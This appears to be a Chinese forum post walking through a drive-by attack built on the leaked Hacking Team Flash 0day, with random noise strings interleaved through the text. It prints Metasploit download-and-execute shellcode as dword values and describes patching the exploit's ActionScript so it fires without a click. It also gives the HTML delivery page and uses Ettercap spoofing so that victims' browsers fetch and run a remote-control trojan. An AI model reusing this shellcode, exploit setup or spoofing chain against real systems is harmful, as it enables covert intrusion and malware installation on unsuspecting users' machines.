|
3 O2 ?3 G4 g4 K, D% } 三、flash 0day之手工代码修改制作下载者实例入侵演示
9 M. n& M8 ?/ V. |$ r! P5 _ 1 s$ g- @7 w7 O% O" @
% O8 C7 s: l6 u) a 利用到的工具: 2 C1 ?2 f- w. b3 X
) {* |. H2 Z0 G" H* F d! J
9 \ |; g; C4 R( |6 |# q Msf
) V- V* U$ R; W# u1 [0 g5 K
0 C; R' L& ?( S4 z
$ Z j7 l6 ]0 @# Z! |7 g" V Ettercap 8 V5 o8 [" |' A" b a' w! e. X' Y
; X$ y9 ]4 x2 Y b0 @
. ]' W- O: X1 r; y7 k2 | Adobe Flash CS6
% @9 M; ]& H2 L) |+ W' J
1 k) @, v# u( b; I
, G- o7 K+ M9 h, L8 m Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 % e# `; L2 d2 x, w6 f
/ G0 _ x" ~7 L$ W/ }7 ~8 I. v
8 l' v+ u9 H2 w 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
0 O3 I! P W0 E6 q
+ ^/ E' z, s- a% S
8 _; X6 _/ L5 a1 ]) t5 P, R 如图:
5 Q6 H& u) [: o' G) E" a- p q: e
! D# y, B& h$ ]6 @" w
) P! S' G" c/ a - l4 `. x; B7 d$ ]
) T- L7 X) s u+ h- E
5 U' d" ~9 b+ a6 z3 V5 u5 ~  , G. R# P- N- [) i. {
5 D# e& o+ [* I! C4 X9 K9 ^! e
* R/ d' d4 v8 _$ U* o& X
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: - z, a+ h4 Z4 O
5 s3 O$ O, A( _7 B3 [8 b4 }$ \" t
' Y( l% l2 B4 Y6 J V / G9 ]6 Q# G) a" ?8 ?% X
- G3 b4 ?% j+ j- e O
% K+ W. l8 c) a' L
& n" V1 a: r2 o) w( r0 j3 p& [
) ~$ ?9 H( V4 I1 C5 L( k) I
6 f8 ]5 E0 R( q/ v( C9 M6 S1 q 然后执行generate -t dword生成shellcode,如下: ( \ @" e Y2 z) x& k
/ `: S/ V: @; J" n4 p$ \4 `1 e
) `6 n8 e$ w+ O/ d7 F4 `) [5 Z* L 
1 e- b+ g+ o, l Q/ R9 z t, L j0 b, Y/ B3 u
+ Z7 X; V1 z4 ]' q4 Q1 U" S+ a 复制代码到文本下便于我们一会编辑flash exp,如下:
$ Y# I1 ^* S4 y9 T0 a$ W+ _
! t% ^, ?# S- X& E/ v9 |4 P
! g7 k& T) ~4 l 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
1 c5 J6 d0 S+ J' g. G
6 V% [" G5 q/ U) Z! V9 _) ^: u1 E: k/ J |/ L2 C$ q
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 K6 v, Y9 V; S( f' c
( N" Q4 V9 [: ^5 E; m6 Q5 Q$ j1 t* F/ z% Z: D: |: C
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 2 K: q; _7 {+ T! m* Z3 q# Q
1 k. U2 C3 x4 N# h0 F3 d9 D$ N" L5 s4 y2 s! g2 p
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 R* J+ r9 P# p+ B: C
+ z6 }! Y% Y6 E' b: |1 b0 i; X; B& ]+ _. s: b% D2 l7 q) A
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
5 d% q9 B0 g- d' K0 @( V
3 A6 T4 q x5 I U, c0 g- ?* e( \3 U1 o) \1 D H* c! Z
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 7 ^& t8 ?2 Y# S) i/ |: Q, _( R. }9 m
. n! Y$ ?4 p( P" [- Z& `0 q* ^2 w
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
, E& [2 k5 }4 x3 q8 `9 t m7 x & y; ?& ^6 N4 X, Z7 a& Z) ~
! M+ }0 B& `% Q3 ]; u* v
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 f# h- [2 a0 a7 M
" s2 V0 E X+ F; \% _# ^2 C, K$ _1 W8 O3 P, Q; M. }
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, : U/ { u! F! n2 u3 h# E* o
, L% u$ R) R- K3 g1 |$ b
1 `4 L3 x: }+ H, D' M& r& Q 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, - ^: o x7 m7 W# }: O+ h
+ e/ h9 j5 x& V8 s: G* D- r( e
& ?2 q# _, Y {. m1 I8 t( ` 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ; ~- w- ^' c- u7 Y6 W. J
9 \8 l8 f4 O8 l% d1 l; Y
* [6 V1 Y, _( t5 r5 b; y5 D 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
@ S F9 }$ I% E
4 G7 a$ R; W- W8 @& l* ^7 s& ^: L0 D' `
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
2 v. \6 r' n. Z" r, p8 y8 B1 g
+ n+ W* X, M) ` E2 ]1 Q1 U
, ]. B! ^2 y" @8 [3 ?$ e 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + [2 V0 C. Z8 l! x3 x
7 M) u, ]5 e4 ]; I- p# t. b# S6 W
b% m' [# B- |* K' A " K; [$ l5 L1 Z! _0 X
+ x9 h5 m$ f4 d# N* y- d7 f: }( D
: [9 C" [$ s9 {, v ; G3 }# w6 }6 ^8 q9 x4 Y% c
" U" [4 B; v$ M$ |: |
, o% p1 q3 F- K. O' l 下面我们来修改flash 0day exp,需要修改三个文件,分别为: & O9 e- [4 a- J8 P8 X; I
. j1 G$ @9 @! p( w1 {9 D* E
' b& P8 Y( `0 k( M, D0 S$ p( }
 6 }7 v% j! I6 H8 X' M0 E5 B- y
, v) T/ J; s0 X; U! V. ~9 A3 H7 Y8 q$ {5 G! ]' L% Q$ F$ Z
先修改ShellWin32.as,部分源代码如图:
# w( y0 x1 p+ B/ M6 i 0 W0 z7 x) G( f, J" g0 a1 V9 H" V
1 i; g( D- {' @6 k 
% \8 N! Y9 P7 D
% W7 r+ r( Z4 \- W N% W" s7 U9 n, u8 `7 m5 h* v
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 7 q' ]& k; g: [
% W, `( ~& R2 p5 f$ g
: d7 B7 x; W9 F 
& l+ O* |0 t/ o+ V2 Q
& h. U1 r2 [5 i1 O* H
0 z; P$ X3 N; t J% h4 \$ X" i( D 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: # n% Z" U8 E& N, J# D1 z
4 e1 j6 p2 Z) D! V) f H9 O
9 [, ]6 R& K; I, U  8 J t& ~. y+ d/ m; C6 }
) o% V( Y( u1 }" T0 b9 s
* `% T8 G2 P# x6 { 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
1 R1 h3 {& _' J* J, ?; L4 M6 D. k, \
+ P9 A$ a4 k" E. e& P! S* c8 g7 f0 Y
) e4 x1 |0 @' b) [# a/ p) q+ q
z% r$ V) {+ I6 i5 p) v. i
; i( ^" @7 j0 q3 U$ ^6 u8 p$ \
9 I v* s- v9 G
5 y% g0 Z1 I3 L% P) G
5 K- r( t2 E- H5 h% c. s# k& M 
) @! Q0 w9 k% g( {. y2 S( O / s9 ^3 |1 l2 y, Z# U! q9 F7 C" P
3 x, ]7 m1 c, {8 f4 w- O
然后点保存,下面我们来编译一下,打开
+ T* v6 B5 R ]& v ! P4 T( C. `( r4 \5 S: K1 U6 {
4 Q: H% y, r. X exp1.fla然后点文件-发布,看看编译没错误 ' t2 z0 t' ~2 c
7 @9 P* e( s, G- J
: F( O; G( [3 O' ?4 M$ N * E3 p% q" o! S6 ]! r4 h8 u; H3 s
+ ^0 E; E5 v" O/ c
7 Y& F/ f8 k- D4 u9 k % j( I4 k" F! i1 F8 k" h& `9 D
4 S! z# ~, S) W8 D4 U* n9 E4 Y ^% T& _) C
) R. m5 [/ z* L3 V2 `/ c. Q
3 {0 `+ m4 O2 V
* Y+ J, t/ a9 g5 |  3 R6 s/ i- ^: C- ?1 @' W4 A
- \$ d% f& D6 m& D
" \* E v# h! _$ ~. v/ Y
然后我们把生成的
7 {8 A. z4 s- O. z7 g3 P
A! i5 C9 t( K7 |6 {" i. z
# i; h! F B2 [# s) h exp1.swf丢到kailinux 的/var/www/html下:
* \$ X6 d9 Z: @& ~5 K' g8 t
& P8 F: l$ A+ b( ?7 L% z$ J9 n; D9 `& ^4 m
然后把这段代码好好编辑一下
0 D1 ?# y6 }3 H9 m
' A# x6 C Z5 b2 r$ c( S7 \/ X( W! `# u8 r. O& q7 f* ]
* ~8 `" f1 H* b2 I& Z: [: ~$ V& y r0 w1 }* ?. h v n
; v; C! z- M/ {3 z
' g j+ H- d( ]/ V) x5 k 2 C4 O) w: d8 {' Z3 |/ A' E
- E" d# L4 a2 |7 P V/ z4 f9 \; p L6 l
) N+ L; k" L5 q: R C4 I% l: M
( p {. S; u* s% U: p4 e/ Z
1 I' }. y' y# w
6 R& ?4 @* c1 v6 o, k1 ~7 }/ ^' ]' w$ b Q- V: d* U, ?7 |
' z# i T( v( X9 ^& G& c
( |0 C% j0 v7 [# E. ?1 ~0 D; g3 [! f, a( x
- L" U! [- e) x/ N( L" T2 y
- {2 d) B. G. G$ E' O- T; \$ L+ ]- S( T) A/ Q& ?- K
<!DOCTYPE html>
: I# C7 d3 f$ @- D) }4 z ) w9 b* i7 f$ H4 A. L$ m3 q
8 f" L6 t4 E% z, t* b+ v6 ]
<html>
8 s3 g Z8 I o, v- P1 p4 E6 I # c, u# f8 v! p* S
% B; q9 t6 h; U1 u: r: E# `8 ^7 O <head>
- M) ^2 z5 P5 a$ j6 d: d7 k: x
. s3 L: V* x; {7 h( G
- d3 m: U# m) k* l <meta http-equiv="Content-Type" content="text/html; ) r" e( ~, k2 b/ u9 ^
- u8 Q+ ?5 i( `9 {! o. q, E9 X: t
; k+ r9 }* S& ~
charset=utf-8"/>
* R3 k! w& h- p5 K
: E( {# e' @9 o$ D/ v. o
& K2 p5 C0 O: N' c$ y- @ </head> / D! `- g1 y6 d5 ~& O0 \
# j6 {3 @4 D. E/ l
' e6 |' |: m$ J <body> % ?6 k! x/ d) |+ \' U+ Y. R! ^
0 T+ Z9 m7 y1 Y" `: u6 O3 g
$ J0 y/ j H: } q <h2> Please wait, the requested page is loading...</h2> , p: J8 v% w D2 P/ R9 u0 s
" d0 A: t K" V% `1 l4 m' K1 b* H. j' ^8 v) i- u/ p3 M+ u1 {5 V
<br>
, \- O a# p3 d' l
/ i* h( c0 I5 |$ G4 _; ?! O! a* w, @ w+ z8 x- p
<OBJECT 9 I+ E1 w, D$ ^% T2 c {
; T/ J! [) i- ~+ K2 y/ T! x; D5 s9 t
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 3 l2 O! m. w9 f. }( F% m' j
/ I# y, m0 O+ }9 C. g
. W5 h7 E2 t9 f8 n6 W0 `2 ]& E VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 g. y# M* G! p: `
% v2 B8 o$ ?' j) f& @
: L' \, l2 u* a% \
</body>
* E# `+ u$ o% g
* a& Z; r- R5 }$ L }" r2 e
# U% K v; d: F A2 N: s0 { <script>
( [, P6 [* Q! `% i- O j" r 6 H3 ~ |9 r# w& X' Z3 N2 g
; d$ ?% z. t4 T setTimeout(function () {
# k3 K0 H6 H+ Q0 { F
% Z; I% d5 W3 G8 O5 i% p9 o; g7 ~0 B6 k% I$ S" w+ e; G: t
+ i. n- L+ U. J. @2 `
6 _) _8 h. O1 K1 b( c- u: R+ s, D5 e
window.location.reload();
% a, i2 }8 d7 }$ m
4 {8 p1 g% d! @5 r+ M; I& F* s/ U' N1 ?8 y
}, 10000); * Y9 H1 K/ F/ i! N n
- t. |: e! i m6 v1 i
4 `$ h# _9 @% G7 q
6 I. ^+ f" M, w & K* q* ], J. y( z: |" ?) O! b. t
9 H" ^) H$ Z3 F; Z/ h </script> 7 E% L5 U% I( L' k! ^
9 r( i q# l& M9 n0 I
; f' j( w: }# ^9 t# n' W
</html> 4 k& A$ |' p: [4 H
0 N$ W1 t) e/ A) M& f$ \3 q: C6 P
# u$ [# t* H/ d; V/ w$ U+ r2 ]2 s* V+ q
$ O9 O; | H6 z1 h/ r9 X( C1 t. [ : _- ~% E" h) v
* t5 w8 V0 P" P
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 9 P1 p* J3 Y m8 l
" |( ]" @ y( P2 _
% k8 W& i. e2 t' c
 $ r8 ~2 }. J- b9 F
- P* j7 o" I E) r+ @& ]) ]
" I: c1 t3 O6 B; M2 ~* e 7 ]' C' f4 ~) k6 o% ?
6 h, U% a% ]% B4 m: Z1 m5 O. G# y$ r8 L4 r ` ?# Z3 f
; v% j+ n' g- q
# T5 b' L6 R+ n( o
# I: }7 E1 y# y& O# U
- A3 v5 e: e+ [, C$ Z& R6 N 1 U4 [: ~5 H) a- Z/ h2 J& y
* j1 A/ w2 z% i% K % a5 p9 x3 X+ B' u; f* t
; H% ]0 |& c9 x/ Z; _
' A/ ^6 `5 d+ Q6 A 下面我们用ettercap欺骗如图:
2 S' r) j' h9 y7 k - @* D6 C* w9 v; q
( b7 |; e. W, l5 m3 N8 M/ p  ; A: r1 i. [( D+ k
! h! U0 Y( b9 }( Q- l0 h. i0 q
, i% Z1 p3 a1 N( L! _4 ~
2 b3 j) y3 C6 j) g* [/ [ & t) S6 u( Q9 T, v& @% t) ?, @
# S9 O' h7 u F8 S6 e: D& r, \
下面我们随便访问个网站看看:
7 x- m' W1 @, |2 S " `0 H; {. Q0 X1 i
1 F: c; j4 j! G4 f7 B* A
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 9 q9 ~1 C8 H# s' @3 [# W, y
4 ~, `/ U3 ~" U/ c$ M$ ^$ ?" Z
( i3 K0 h- T$ L' B# z; q  7 N( l/ K: D% p L! Z7 l+ G
: G; i6 q: B2 I, a2 ?. D5 p% ^4 n$ _& X
我们看另一台, ( [. J2 V2 g* f
5 R! y- {% o# Y3 V
, ?4 U P3 t1 j& Z$ u% g" F' p& [+ l4 Y/ Z 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 9 H: B- q3 E }; B1 f( ~+ S: W, t
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对